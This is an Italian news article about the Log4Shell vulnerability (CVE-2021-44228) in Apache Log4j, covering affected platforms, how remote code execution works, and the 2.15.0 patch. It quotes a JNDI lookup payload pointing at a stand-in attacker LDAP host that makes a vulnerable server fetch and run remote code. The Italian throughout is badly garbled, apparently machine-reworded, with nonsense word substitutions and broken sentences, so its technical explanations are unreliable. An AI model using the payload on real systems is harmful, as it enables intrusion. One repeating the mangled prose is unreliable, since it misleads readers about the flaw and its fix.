sviluppatori che Apache hanno reso incline un differimento per mezzo di cui annullare la vulnerabilità 0-day (CVE-2021-44228) le quali affligge la Log4j per mezzo di un di i server che numerose piattaforme copiosamente utilizzate, basti concepire a Minecraft, Steam, Twitter e iCloud, similmente come mai di i client le quali interagiscono per mezzo di queste ultime.
Log4j: le piattaforme coinvolte
Parliamo che una vulnerabilità (clausola come mai Log4Shell) così carico attraverso un equipollente a 10 su 10 nella gradazione CVSS (Common Vulnerability Scoring System), non rettamente che esse un malintenzionato potrebbe dar forza ad RCE (Remote Code Execution) eseguendo del regolamento sfornito di fato che e per mezzo di tecniche in relazione basilari.
A tal assunto esisterebbe il Proof of concept che un le quali ha avuto come mai target Twitter.
perizia la vulnerabilità deriverebbe attraverso come mai i messaggi che loch vengono gestiti dal log4j, se non altro di un attaccante inviasse un lettera apposta confezionato di cingere un sul paradigma della consecutivo:
${jndi:ldap://rogueldapserver.com/a})
il effetto potrebbe esistenza quegli che addossare del regolamento estraneo e che eseguirlo. consecutivo evidenzia ad come mai simile prassi possa esistenza effettuata trafila il citazione ad una JNDI (Java Naming and Directory Interface) per mezzo di un User-Agent:
the #log4j scramble per mezzo di a nutshell pic.twitter.com/XSwxEJucsI
— Yong Sheng (@ystan_) December 13, 2021
che un’intreccio malevola sono spiegati schiettamente nel resoconto riportato dal CSIRT (Elaboratore elettronico Security Incident Response Team):
L’possibile esaurimento della fenditura consente l’ che regolamento a alterazione dell’zelo affetta. aggressori, le quali necessitano che un attacco difensivo al complesso, possono guidare una domanda https malformata trafila una apposta predisposta, di figliare un loch su Log4j – le quali adotta JNDI (Java Naming and Directory Interface) – al sottile che enumerare la dannosa nel cambiare registro dell’zelo. All’epoca di l’produzione del cambiare registro, il complesso si troverà nelle condizioni che esegue il regolamento apposta inserito dall’ malintenzionato. Questa grado può ad condurre l’zelo ad adempiere una domanda richiamo un sovranità deleterio di adempiere un payload . questo di l’attaccante sarà ipotizzabile il ispezione dell’zelo interessata e l’attacco perfetto al complesso.
A trasformare specificamente malsicuro la vulnerabilità sarebbe il scena le quali esse coinvolge tutte le soluzioni della Apache Software Foundation dedicate ai contesti enterprise cui ad Struts, Flink, Druid, Flume, Solr e Kafka. Nello uguale potrebbero esistenza esposti a problematiche che progetti come mai Redis, ElasticSearch ed Elastic Logstash.
Un differimento finale?
L’differimento installabile è tema nella narrazione 2.15.0 e per mezzo di si sono chiesti se non altro per mezzo di quello stesso si potrà trasferire alla normalità una condizione considerata ingiustamente compromessa.
Certi esperti che hanno scena considerare le quali il sarebbe solamente nel evento per mezzo di cui il baldanza del regola log4j2.formatMsgNoLookups dovesse esistenza settato su FALSE. Oggigiorno nella release 2.15.0 quest’supremo sarebbe governo impostato su TRUE e riportarlo su FALSE farebbe prossimo le quali invalidare l’tornaconto della patch.
Stando similmente le masserizie, il scena che subito sul regola citato modificandone il baldanza per mezzo di TRUE potrebbe originarsi il maggior numero potente le quali adottare un differimento per mezzo di cui viene conservato il baldanza predefinito di log4j2.formatMsgNoLookups.
Le versioni a sono per mezzo di perizia tutte quelle la 2.0 e la 2.14.1, a ciò si aggiunga le quali che diradato Log4j viene utilizzato per mezzo di release che Java datate e obsolete le quali che di sé offrono importanti garanzie dal della .
Sorgente: Log4j